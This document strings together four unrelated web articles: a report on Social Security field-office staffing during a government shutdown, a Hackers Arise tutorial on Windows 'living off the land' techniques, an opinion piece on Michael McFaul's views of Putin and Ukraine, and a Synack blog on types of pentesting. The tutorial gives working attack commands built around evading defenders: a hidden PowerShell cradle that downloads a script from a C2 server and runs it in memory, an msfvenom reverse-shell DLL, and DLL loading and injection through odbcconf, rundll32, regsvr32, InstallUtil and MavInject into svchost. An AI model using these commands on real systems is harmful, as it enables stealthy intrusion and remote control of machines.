The Social Security Administration is considering whether to put more of its in-person services on hold, as employees working without pay during the longest government shutdown can no longer afford the cost of coming into the office.

SSA’s Chief of Field Operations Andy Sriubas told managers on a call Thursday afternoon that the agency may need to stop issuing replacement Social Security cards, if the shutdown continues, given concerns about short staffing.

Several managers also told Sriubas, in a recording of the call obtained by Federal News Network, that some field office employees working without pay are asking to be furloughed, because they can no longer cover commuting costs.

Many federal employees have missed two full paychecks during the shutdown, and received one partial paycheck.

“If this goes into next week, I asked folks to start thinking about what are the workloads … we’re just not doing that, going forward, until the shutdown ends,” Sriubas said.

Depending on when Congress reaches a deal to end the shutdown, it’s possible that SSA employees receive a partial paycheck before receiving the rest of their retroactive pay.

Replacement Social Security cards are one of the biggest reasons individuals show up at Social Security offices. Last year, about 7.7 million people requested replacement cards. The agency stopped issuing replacement Social Security cards in previous shutdowns.

Much of SSA’s workforce is considered “excepted” and continues working without pay during a shutdown. But Sriubas said the agency may need to scale back some shutdown-exempt services if the shutdown lasts much longer.

“Just because it’s an excepted workload doesn’t mean we have to do it. So we can decide not to do it,” he told managers.

SSA was planning to launch its new appointment scheduling system in January. But Sriubas said the rollout has been pushed back by about six weeks because of the shutdown.

An SSA spokesperson told Federal News Network that “Social Security Administration continues to serve our nation’s seniors and most vulnerable populations during the Democrat shutdown.”

“We recognize this is a stressful and challenging time for SSA employees who are currently working without pay because the Democrats won’t reopen the government,” the spokesperson said.

Senate Democrats on Friday proposed voting for a continuing resolution to end the shutdown, in exchange for a one-year extension of Affordable Care Act tax credits. But Senate Majority Leader John Thune (R-S.D.) called the plan a “nonstarter.”

‘They won’t be able to afford to work at the agency’

One manager said during the call that employees can no longer afford commuting costs, including filling up their cars to drive to work. Others are asking to be furloughed, so that they can take second jobs to pay their bills.

“Pretty soon, they won’t be able to afford to work at the agency,” the manager said.

SSA required all employees to work fully on-site beginning in March, because of President Donald Trump’s return-to-office orders for the federal workforce. But there is still a possibility, at times, for employees to get approval for “episodic telework,” a shorter-term option when unexpected personal circumstances arise.

Sriubas said teleworking five days a week is still prohibited, and that managers can furlough staff for the remainder of the shutdown, so that they don’t have to spend any money to come into the office.

“That’s, unfortunately, the only option we have,” he said.

The American Federation of Government Employees, which represents about 42,000 SSA employees nationwide, is calling on SSA to allow more routine telework during the shutdown.

If enough SSA employees request furlough status, some offices may need to be temporarily closed.

SSA closed two of its 1,250 field offices on Monday due to limited staffing. An agency spokesperson said one of the offices reopened for normal operations on Tuesday. Sriubas told managers that more offices may be at risk of temporary closures, if the shutdown drags on.

“I understand that that’s going to happen, and nobody wants to close an office. You guys are all captains of your ship, and everybody wants to make sure that that’s never going to happen. But I also understand that people have to live their lives, and they have limited means to do that when you’re now missing your second full paycheck,” he said. “So if putting people on furlough is the only thing you can do, if it’s the best thing for the employee, that’s what we’re going to have to do.”

Some managers said employees are frustrated, because they want to keep working during the shutdown, but are financially squeezed and unable to telework.

“We do have employees that have been embarrassed to come to me and say that they can’t afford to come to work, and they want to telework instead of being furloughed, and I understand that’s not an option,” another manager said. “There really are people that are struggling with the decision between finding a way to get to work, and wanting to work, and our only option is being furloughed.”

Other managers said employees are scared to go on furlough, because the Trump administration has floated the possibility that furloughed staff will not receive back pay once the shutdown ends.

“I have employees that are skeptical and kind of scared, to be truthful, to use furlough because they’re not comfortable or confident that once the shutdown is over, that they’re going to be compensated if they were on a furlough status,” a third manager said.

Sriubas acknowledged the administration has created uncertainty around back pay for furloughed employees, but said it would be “political suicide for either the Republican or the Democrat party to suggest that they wouldn’t support paying the people that were on furlough during this whole process.”

“Rumors in the press are just simply that — rumors in the press. In the past, everybody has gotten paid, and it is expected that most likely everybody will get paid who’s on furlough. But, you don’t know, it’s not 100% and I appreciate people are nervous to go on furlough because of that — because that risk that they wouldn’t get paid,” he said.

During the shutdown, SSA has paused work on some mandated work with benchmarks set by Congress. That includes continuing disability reviews (CDRs) and redetermination for Supplemental Security Income (RZs).

The former involves SSA reviewing the medical records of those receiving disability benefits, and determining whether they are still disabled. The latter involves the agency reviewing non-medical factors — like income and resources — to determine if individuals should remain on disability benefits.

Congress mandated SSA to complete 2.4 million redeterminations for Supplemental Security Income and 400,000 continuing disability reviews last year. Sriubas said SSA will work on resetting its workload targets once the shutdown ends.

“I fully appreciate that we’re not going to be able to deliver what we thought we were going to deliver when we looked like we had a 12-month year to be able to go do that stuff,” he said.

A fourth manager said during the call that it is “hard to keep morale going,” and that employees know that “as soon as the shutdown is over, we’re going to hit them hard” with a backlog of casework.

“It’s very frustrating when we have to keep those staff motivated — and we need them for the long haul. Not just for this fiscal year, the next fiscal year,” the manager said.

Sriubas said the agency will offer overtime to employees to dig out from the backlog. SSA managers were also told during the call that once the shutdown ends, the agency will work with the Interior Department — which handles payroll for a wide swath of the federal workforce — to ensure excepted employees receive retroactive pay “as quickly as possible.”

The post Social Security considers pausing more work, as shutdown takes a toll on employees first appeared on Federal News Network.

© AP Photo/Nam Y. Huh

Welcome back, cyberwarriors! 

We hope that throughout the Survival series, you have been learning a lot from us. Today, we introduce Living off the Land techniques that can be abused without triggering alarms. Our goal is to use knowledge from previous articles to get our job done without unnecessary attention from defenders. All the commands we cover in two parts are benign, native, and also available on legacy systems. Not all are well-known, and tracking them all is impossible as they generate tons of logs that are hard to dig through. As you may know, some legitimate software may act suspiciously with its process and driver names. Tons of false positives quickly drain defenders, so in many environments, you can fly under the radar with these commands. 

Today, you’ll learn how to execute different kinds of scripts as substitutes for .ps1 scripts since they can be monitored, create fake drivers, and inject DLLs into processes to get a reverse shell to your C2.

Let’s get started!

Execution and Scripting

Powershell

Let’s recall the basic concepts of stealth in PowerShell from earlier articles. PowerShell is a built-in scripting environment used by system administrators to automate tasks, check system status, and configure Windows. It’s legitimate and not suspicious unless executed where it shouldn’t be. Process creation can be monitored, but this isn’t always the case. It requires effort and software to facilitate such monitoring. The same applies to .ps1 scripts. This is why we learned how to convert .ps1 to .bat to blend in in one of the previous articles. It doesn’t mean you should avoid PowerShell or its scripts, as you can create a great variety of tools with it. 

Here’s a reminder of how to download and execute a script in memory with stealth:

PS > powershell.exe -nop -w h -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('http://C2/script.ps1')"

Walkthrough: This tells PowerShell to start quickly without loading user profile scripts (-nop), hide the window (-w h), ignore script execution rules (-ep bypass), download a script from a URL, and run it directly in memory (DownloadString + Invoke-Expression).

When you would use it: When you need to fetch a script from a remote server and run it quietly.

Why it’s stealthy: PowerShell is common for admin tasks, and in-memory execution leaves no file on disk for antivirus to scan. Skipping user profile scripts avoids potential monitoring embedded in them.

A less stealthy option would be:

PS > iwr http://c2/script.ps1 | iex 

It’s important to keep in mind that Invoke-WebRequest (iwr) and Invoke-Expression (iex) are often abused by hackers. Later, we’ll cover stealthier ways to download and execute payloads.

CMD

CMD is the classic Windows command prompt used to run batch files and utilities. Although this module focuses on PowerShell, stealth is our main concern, so we cover some CMD commands. With its help, we can chain utilities, redirect outputs to files, and collect system information quietly.

Here’s how to chain enumeration with CMD:

PS > cmd.exe /c "whoami /all > C:\Temp\privs.txt & netstat -ano >> C:\Temp\privs.txt"

Walkthrough: /c runs the command and exits. whoami /all gets user and privilege info and writes it to C:\Temp\privs.txt. netstat -ano appends active network connections to the same file. The user doesn’t see a visible window.

When you would use it: Chaining commands is handy, especially if Script Block Logging is in place and your commands get saved.

Why it’s stealthy: cmd.exe is used everywhere, and writing to temp files looks like routine diagnostics.

cscript.exe

This runs VBScript or JScript scripts from the command line. Older automation relies on it to execute scripts that perform checks or launch commands. Mainly we will use it to bypass ps1 execution monitoring. Below, you can see how we executed a JavaScript script.

PS > cscript //E:JScript //Nologo C:\Temp\script.js

Walkthrough (plain): //E:JScript selects the JavaScript engine, while //Nologo hides the usual header. The final argument points to the script that will be run.

When you would use it: All kinds of use. With the help of AI you can write an enumeration script.

Why it’s stealthy: It’s less watched than PowerShell in some environments and looks like legacy automation.

wscript.exe

By default, it runs Windows Script Host (WSH) scripts (VBScript/JScript), often for scripts showing dialogs. As a pentester, you can run a VBScript in the background or perform shell operations without visible windows.

PS > wscript.exe //E:VBScript C:\Temp\enum.vbs //B

Walkthrough: //B runs in batch mode (no message boxes). The VBScript at C:\Temp\enum.vbs is executed by the Windows Script Host.

When you would use it: Same thing here, it really depends on the script you create. We made a system enumeration script that sends output to a text file. 

Why it’s stealthy: Runs without windows and is often used legitimately.

mshta.exe

Normally, it runs HTML Applications (HTA) containing scripts, used for small admin UIs. For pentesters, it’s a way to execute HTA scripts with embedded code. It requires a graphical interface.

PS > mshta users.hta 

Walkthrough: mshta.exe runs script code in users.hta, which could create a WScript object and execute commands, potentially opening a window with output.

When you would use it: To run a seemingly harmless HTML application that executes shell commands

Why it’s stealthy: It looks like a web or UI component and can bypass some script-only rules.

DLL Loading and Injections

These techniques rely on legitimate DLL loading or registration mechanics to get code running.

Rundll32.exe

Used to load a DLL and call its exported functions, often by installers and system utilities. Pentesters can use it to execute a script or function in a DLL, like a reverse shell generated by msfvenom. Be cautious, as rundll32.exe is frequently abused.

C:\> rundll32.exe C:\reflective_dll.x64.dll,TestEntry

Walkthrough: The command runs rundll32.exe to load reflective_dll.x64.dll and call its TestEntry function.

When you would use it: To execute a DLL’s code in environments where direct execution is restricted.

Why it’s stealthy: rundll32.exe is a common system binary and its activity can blend into normal installer steps.

Regsvr32.exe

In plain terms it adds or removes special Windows files (like DLLs or scriptlets) from the system’s registry so that applications can use or stop using them. It is another less frequently used way to execute DLLs.

PS > regsvr32.exe /u /s .\reflective_dll.x64.dll

Walkthrough: regsvr32 is asked to run the DLL. /s makes it silent. 

When you would use it: To execute a DLL via a registration process, mimicking maintenance tasks.

Why it’s stealthy: Registration operations are normal in IT workflows, so the call can be overlooked.

odbcconf.exe

Normally, odbcconf.exe helps programs connect to databases by setting up drivers and connections. You can abuse it to run your DLLs. Below is an example of how we executed a generated DLL and got a reverse shell

bash > msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.57 LPORT=4444 -f dll -o file.dll

PS > odbcconf.exe INSTALLDRIVER “Printer-driverX|Driver=C:\file.dll|APILevel=2”

PS > odbcconf.exe configsysdns “Printer-driverX” “DNS=Printer-driverX”

Walkthrough: The first odbcconf command tells Windows to register a fake database driver named “Printer-driverX” using a DLL file. The APILevel=2 part makes it look like a legitimate driver. When Windows processes this, it loads file.dll, which runs a reverse shell inside of it. The second odbcconf command, creates a system data source (DSN) named “Printer-driverX” tied to that fake driver, which triggers the DLL to load again, ensuring the malicious code runs.

When you would use it: To execute a custom DLL stealthily, especially when other methods are monitored.

Why it’s stealthy: odbcconf is a legit Windows tool rarely used outside database admin tasks, so it’s not heavily monitored by security tools or admins on most systems. Using it to load a DLL looks like normal database setup activity, hiding the malicious intent.

Installutil.exe

Normally, it is a Windows tool that installs or uninstalls .NET programs, like DLLs or executables, designed to run as services or components. It sets them up so they can work with Windows, like registering them to start automatically, or removes them when they’re no longer needed. In pentest scenarios, the command is used to execute malicious code hidden in a specially crafted .NET DLL by pretending to uninstall it as a .NET service.

PS > InstallUtil.exe /logfile= /LogToConsole=false /U file.dll

Walkthrough: The command tells Windows to uninstall a .NET assembly (file.dll) that was previously set up as a service or component. The /U flag means uninstall, /logfile= skips creating a log file, and /LogToConsole=false hides any output on the screen. If file.dll is a malicious .NET assembly with a custom installer class, uninstalling it can trigger its code, like a reverse shell when the command processes the uninstall. However, for a DLL from msfvenom, this may not work as intended unless it’s specifically a .NET service DLL.

When you would use it:. It’s useful when you have admin access and need to execute a .NET payload stealthily, especially if other methods are unavailable.

Why it’s stealthy: Install utilities are commonly used by developers and administrators.

Mavinject.exe

Essentially, it was designed to help with Application Virtualization, when Windows executes apps in a virtual container. We use it to inject DLLs into running processes to get our code executed. We recommend using system processes for injections, such as svchost.exe.Here is how it’s done:

PS > MavInject.exe 528 /INJECTRUNNING C:\file.dll

Walkthrough: Targets process ID 528 (svchost.exe) and instructs MavInject.exe to inject file.dll into it. When the DLL loads, it runs the code and we get a connection back.

Why you would use it: To inject a DLL for a high-privilege reverse shell, like SYSTEM access. 

Why it’s stealthy: MavInject.exe is a niche Microsoft tool, so it’s rarely monitored by security software or admins, making the injection look like legitimate system behavior.

Summary

Living off the Land techniques matter a lot in Windows penetration testing, as they let you achieve your objectives using only built-in Microsoft tools and signed binaries. That reduces forensic footprints and makes your activity blend with normal admin behavior, which increases the chance of bypassing endpoint protections and detection rules. In Part 1 we covered script execution and DLL injections, some of which will significantly improve your stealth and capabilities. In Part 2, you will explore network recon, persistence, and file management to further evade detection. Defenders can also learn a lot from this to shape the detection strategies. But as it was mentioned earlier, monitoring system binaries might generate a lot of false positives. 

Resources:

https://lofl-project.github.io

https://lolbas-project.github.io/#

The post PowerShell for Hackers – Survival Edition, Part 4: Blinding Defenders first appeared on Hackers Arise.

OPINION — “The reason why I still remain pessimistic is that everything that [Russian President Vladimir] Putin says is he still wants those four territories…Eastern Ukraine. He hasn't achieved that yet. And he wants Ukraine to be at least subjugated to Russia, because he doesn't think that Ukraine's an independent country or independent nation. Ukrainians are just Russians with accents. That's his view. I've heard him talk about it personally. I've been in the room when he talks that way. And maximally he wants to bring it all into Russia. So, tragically, I think the only way he negotiates seriously is when he's stopped on the battlefield and his armies cannot march further west.”

That was Michael McFaul, President Obama’s Ambassador to Russia (2012-to-2014), speaking with Katie Couric August 18, on YouTube. McFaul, a Russian expert, is today a professor at Stanford University and Director of its Freeman Spogli Institute for International Studies.

In the 53-minute conversation, McFaul provided a background to the Ukraine war, shared his views on the relations between Putin and President Trump, and talked about the possible future when it comes to the NATO and European Union nations and the United States.

Early in their conversation, McFaul provided an interesting background to the past and current fighting which has been taking place in eastern Ukraine, adjacent to Russia.

“So there are four regions that most of the fighting has been taking place,” McFaul said, “In each of those four regions [they] are partially occupied by the Russians today.”

Two of the four regions, Donetsk and Luhansk, together form what’s called the Donbas. Russia holds all of Luhansk and 75 percent of Donetsk. The other two regions are Kherson and Zaporizhzhia, where Russia has about 70 percent of the land.

McFaul said, “Two years ago Putin held a big ceremony where he said these new four regions are now part of the Russian Federation in addition to Crimea, which he annexed back in 2014…So five regions of Russia, five states if you will of the Ukrainian country Putin has already, you know, annexed.”

“On paper,” McFaul continued, Putin “had a big ceremony, there's parades, and the Kremlin and they say he had all these fictitious leaders from these places saying you're now part of Russia, right, but de facto on the ground in reality he doesn't control any of those places 100%.”

McFaul explained the “Donbas is rich in minerals. It's the industrial base of the country. So I think it's like eight or nine percent of the [Ukraine] population…but it's more like 15 percent of

the GDP [gross national product] of the entire country. So it would be a tremendous loss to Ukraine. That is true. Also, half parts of it have been occupied de facto by Russian surrogates

since 2014. So another important thing to realize is that once that happened, many hundreds of thousands of Ukrainians left that territory. They're living all over the place. I have friends from those regions that are living in Germany, living here in the United States, and living in parts, other parts of Ukraine.”

McFaul tied the Donbas to what happened when Trump met with Putin in Alaska on August 15, saying, “We never really got a good readout from what happened in Alaska, but to the best of our understanding, what Putin asked for in Alaska, pretty audacious. He said, Donbas, that's two of those regions, right? That's up in the northwest corner, northeast corner. He said, Mr. President, convince Zelensky to leave Donbas. Remember Ukrainian soldiers and Ukrainians now hold parts of Donbas as we speak…It's Ukrainian held territory and Putin says you got to convince Zelensky to give me those two regions and in return I will stop fighting in those other two regions that I just mentioned. Right? Kherson and Zaporizhzhia…So that's his deal.”

McFaul went on, “That's his offer. And the Ukrainians, you know, I talked to many Ukrainians afterwards. I mean, this is nonsense from them. The idea that they would give up territory that hasn't even been conquered is just a non-starter. But that's what Putin asked for.”

McFaul also set out what he thought the Ukrainians might settle for, while making clear Zelensky had never said it directly.

“I think,” McFaul said, “the part [of Ukraine] that was occupied since 2014 [Crimea, small sections of the Donbas] is a part that Ukrainian people and President Zelensky could live with giving up. Again, I want to stress, they're not going to recognize it as part of Russia, but they could recognize that they will only seek reunification through peaceful means. That's the language...That means that in reality it would be under Russia, you know, as long as Putin's in power.”

McFaul added, “But they're only going to do that if they have some guarantee from the West that by doing that they get something in return for their security. And so when you hear this phrase ‘land for peace,’ the Ukrainians keep saying, well, yeah, you guys keep asking us for land, but you never say what the peace part is. And that is what the conversation [Trump with Zelensky with European leaders] at the White House today [August 21] is, I think, principally focused on.”

Before talking about the Trump/Putin relationship, McFaul gave some interesting personal background about the Russian President.

The Cipher Brief brings expert-level context to national and global security stories. It’s never been more important to understand what’s happening in the world. Upgrade your access to exclusive content by becoming a subscriber.

“I can tell you Putin is an effective interlocutor,” McFaul said, “He is an effective speaker. He will go on and on about Russian history. He'll spin it in his own way. And if you don't know, you know, what happened in the 15th century, and even I don't, you know, so most presidents don't, it's hard to follow. In one meeting with Obama, he [Putin] went on for 58 minutes in the beginning of the meeting before President Obama even had the chance to speak. So that's the way he rolls. I just fear that Trump accepted his, you know, perverse notion of history.”

I saw an example of this side of Putin four years ago, before Russia’s invasion of Ukraine, when a friend suggested I read a 10-page essay published by the Russian President on July 12, 2021, entitled, On the Historical Unity of Russians and Ukrainians. It can still be accessed on Putin’s website.

Putin began it by writing, “During the recent Direct Line [a TV question-and-answer session with Putin] when I was asked about Russian-Ukrainian relations, I said that Russians and Ukrainians were one people – a single whole. These words were not driven by some short-term considerations or prompted by the current political context. It is what I have said on numerous occasions and what I firmly believe. I therefore feel it necessary to explain my position in detail and share my assessments of today's situation.”

Putin continues to push that idea, as he did on August 16 in his joint press conference with Trump in Alaska, when he described Ukrainians as “a brotherly people, no matter how strange it may sound in today’s circumstances. We share the same roots, and the current situation is tragic and deeply painful to us. Therefore, our country is sincerely interested in ending this.”

At one point in their conversation, Couric asked McFaul, “Do you think that Donald Trump is being played by Putin?”

McFaul answered: “Honestly, I think he [Putin] thinks of Trump as being just a really weak leader and with a little bit of praise and a little bit of, you know, repeating things that are false

that Trump wants to hear, he can win him over…So in Alaska, Putin said, ‘I would have never invaded Ukraine had you been president.’ And that's exactly what Trump wanted to hear.”

McFaul went on, “And then behind closed doors, as we learned later in his conversation with Sean Hannity, Putin went on and on about how the 2020 elections was stolen because of mail-in ballots, because of mail-in voting, right?”

Subscriber+Members have exclusive access to the Open Source Collection Daily Brief, keeping you up to date on global events impacting national security. It pays to be a Subscriber+Member.

I studied the Fox Hannity August 15 interview where Trump spoke of “one of the most interesting things” Putin had told him, which was, “Your [the U.S. 2020] election was rigged because of mail-in voting.” Trump then continued. “He [Putin] said mail-in voting, every election. He [Putin] said, no country has mail-in voting. It’s impossible to have mail-in voting and have honest elections.”

McFaul’s response to Trump’s description to Hannity of that portion of his exchange with Putin reflected what other Americans commentators have said.

“I just listened to the President [Trump] talk about that [Putin’s view of the 2020 election],” McFaul said, “and I just can't believe that he [Trump] would be so gullible. Honestly, I guess I should get used to it by now. But what an absurd thing for him [Putin] to claim…How does Putin know that that happened [in the 2020 election]? And no credible American organization, no investigative journalists have uncovered that. But somehow mysteriously the president of Russia knows that it was stolen because there was mail-in voting. And yet the President [Trump] just repeated that and that's how Putin has won him over.”

Three days later, on August 18, Trump messaged on Truth Social: “I am going to lead a movement to get rid of MAIL-IN BALLOTS…We are now the only Country in the World that uses Mail-In Voting. All others gave it up because of the MASSIVE VOTER FRAUD ENCOUNTERED.”

In fact, as reported by Politifact, a Sweden-based organization, Supporting Democracy Worldwide, in an October 2024 report found that at least 20 countries other than the U.S. allow some form of mail-in voting, including Austria, Australia, Japan, India, Canada, Ireland, Greece, Poland, Slovenia, Spain, Switzerland, and the United Kingdom.

Towards the end of the interview, McFaul said there were two major things he hoped for.

“One,” he said was “the security guarantee that we've been talking about where European soldiers are deployed on Ukrainian territory to help keep the peace. Peacekeepers, you

know, tripwire. I don't really like that word tripwire, but where they're there to just keep that border, right?... And you go up to the border and you see all the soldiers there and you see the barbed wire that keeps the peace.”

The second thing McFaul hoped for involved “about $300 billion dollars of Russian central bank assets and other Russian assets that are in our banks. They were correctly, brilliantly frozen by the G7…back in 2022,” after Putin invaded Ukraine.

McFaul said, “The next move, those assets have to be given to Ukraine. Americans don't want to pay for reconstruction. Europeans don't want to pay for it. That's money is sitting right there.” It would be used, McFaul said, as “part of a sweetener” for Zelensky because “he's got to have something else to give the Ukrainian people” to keep fighting against the Russians.

McFaul’s closing point is worth remembering.

Referring to the NATO allies at the White House with Zelensky, McFaul said it should “remind everybody that Moscow, neither the Soviets or the Russians, have never attacked a NATO

country. So NATO expansion has helped to keep the peace especially in places like the Baltic states. But also NATO has never attacked the Soviet Union or Russia. And so we shouldn't buy into this argument that it's a threat to Russia. It's not a threat to Russia…We have to think about NATO as an alliance that preserves the peace rather than causes conflict.”

The Cipher Brief is committed to publishing a range of perspectives on national security issues submitted by deeply experienced national security professionals.

Opinions expressed are those of the author and do not represent the views or opinions of The Cipher Brief.

Have a perspective to share based on your experience in the national security field? Send it to Editor@thecipherbrief.com for publication consideration.

Read more expert-driven national security insights, perspective and analysis in The Cipher Brief

By Kim Crawley

Not everything that’s called “pentesting” is pentesting. There’s an abundance of different types of security testing and tools that use different methodologies for different stakeholders with differing agendas. Security testing, which includes pentesting and also vulnerability assessment, compliance auditing and other formats, is even broader. We’ll break down the differences between types of pentesting and strategies that are labeled pentesting but are fundamentally different. 

First, what are you testing for?

Are you trying to penetrate a network or computer system like a cyber threat actor, but with permission from the owner for the purposes of discovering security vulnerabilities? Then chances are what you’re doing is pentesting. If you’re using a checklist of security standards of some sort and looking for vulnerabilities without simulating cyber attacks, that’s a vulnerability assessment. It sounds obvious, but some entities try to sell vulnerability assessments by incorrectly calling them pentests. Pentests aren’t “better” than vulnerability assessments–they’re different types of security testing. Each can be the best solution for different problems.

The Flavors of Pentesting

Pentesting is having specially trained people simulate cyber attacks. They can use applications, scripts and even conduct analog activities such as social engineering and physical security pentesting. Its strength and weakness is the people doing the testing and the platform they work on. Without good testers on an efficient platform, the test may not leave the buyer with confidence. Traditional pentesting relies on only the skills of a few people and outputs a readable report, not data. Synack was founded to get the best testers on the best platform for the best pentest possible. A pentest’s output – at least Synack style – is real-time access to findings, remediation information, analytics about testing and more.

Different types of pentesting can be categorized according to which facet of a computer system is being tested. The majors are network pentesting, application pentesting, social engineering pentesting that finds vulnerabilities in people and physical pentesting that finds vulnerabilities in buildings, doors, windows, rooms and the like. 

Pentesting is also categorized according to the information available to the testers. Blackbox testing is done with little to no knowledge of a target from the perspective of an external attacker. Whitebox testing is done with in-depth target knowledge from the perspective of an internal attacker in the target’s IT department. And Greybox testing is in the middle from the perspective of a nontechnical insider. 

There are also other ways to prepare for cyber threats that are different from pentesting. Let’s explore some of them. 

Methodologies for Security Testing (That Aren’t Pentesting)

Breach and Attack Simulation (BAS) based on attack replay or scripting is a relatively recent development in security testing tech. Scripts that simulate specific exploits can be executed whenever an administrator needs to test a particular attack. This way, teams are better trained to know how to spot attack patterns and unusual log activity. When the cybersecurity community discovers new exploits, scripts can be used to simulate those exploits. Note that that takes time, so BAS may not be as current as adversarial tradecraft. The testing-like output is confirmation how many known vulnerabilities with easily scriptable exploits exist in your environment. 

BAS is best suited for testing security responses to ensure teams know how to spot attack patterns and strange attacks in their log systems. This is a great training tool for blue teams but will not result in the discovery of unknown vulnerabilities in general. This shouldn’t be viewed as a pen test replacement and usually the scripted models lag the current adversary tradecraft. 

Bug Bounty welcomes members of the general public under well defined policies to security test your software themselves and submit bug reports to your company according to the principles of responsible disclosure. If a bug can be proven and fits your company’s criteria of a prioritized vulnerability, the bug hunter could be awarded a monetary prize of anywhere from $50 to $100,500, but typical bug bounty rewards are about $200 to $1,000. The amount of money awarded for a valuable bug report is affected by several factors including the size of the company’s budget and user base and the criticality of the bug.

Dynamic Application Security Testing (DAST) is an automated technique, but it’s exclusively for testing working applications. So it’s often a tool used by application developers. DAST is used most often for web applications, but other internet-connected applications can be tested this way too. The targeted application must be running, such as a web application on the internet. The exploits that are executed are dynamic, so they may alter course depending on the progress of penetration. 

Risk assessments are sometimes called threat evaluations. In a risk assessment, your security team collaborates with what they know about your organization’s data assets and how those assets could be threatened, both by cyber attack and by non-malicious threats such as natural disasters and accidents. Risks are identified, estimated and prioritized according to their probability of occurring and the amount of harm that could result.

Static Application Security Testing (SAST) has the same goals as DAST, but for application code before being compiled, not for applications that are running in production mode. If a vulnerability is clear from source code – and not all are – it can be detected by SAST.

Tabletop exercises are mainly for incident response teams, a defensive security function. They can be a fun challenge when done well, and help your incident response group face cyber threats with greater confidence. Specific attacks are proposed in the exercise, and the team needs to figure out how they should prevent, mitigate, or contain the cyber threat. If Capture The Flag is the main educational game for the red team, tabletop is the main educational game for the blue team. The output is a more confident and prepared team. Sometimes, refinements for an organization’s threat modeling also emerge. But actual vulnerabilities will not often be found during these exercises.

These and other newer technologies (artificial intelligence and machine learning in particular) are useful tools for security leaders. Computer software acts faster and doesn’t get tired, but the most flexible thinking comes directly from human beings. 

Computer scientists know that computers can only simulate randomness, it takes a living being to actually be random. And human pentesters, like the Synack Red Team, are the best at simulating human cyber attackers and the serious exploits they regularly find.

For a deeper look at the Synack Red Team and its diverse skill set, read our latest white paper, “Solving the Cyber Talent Gap with Diverse Expertise.”

The post What You’re Missing About Pentesting: 6 Tools That Look Like Pentesting But Aren’t appeared first on Synack.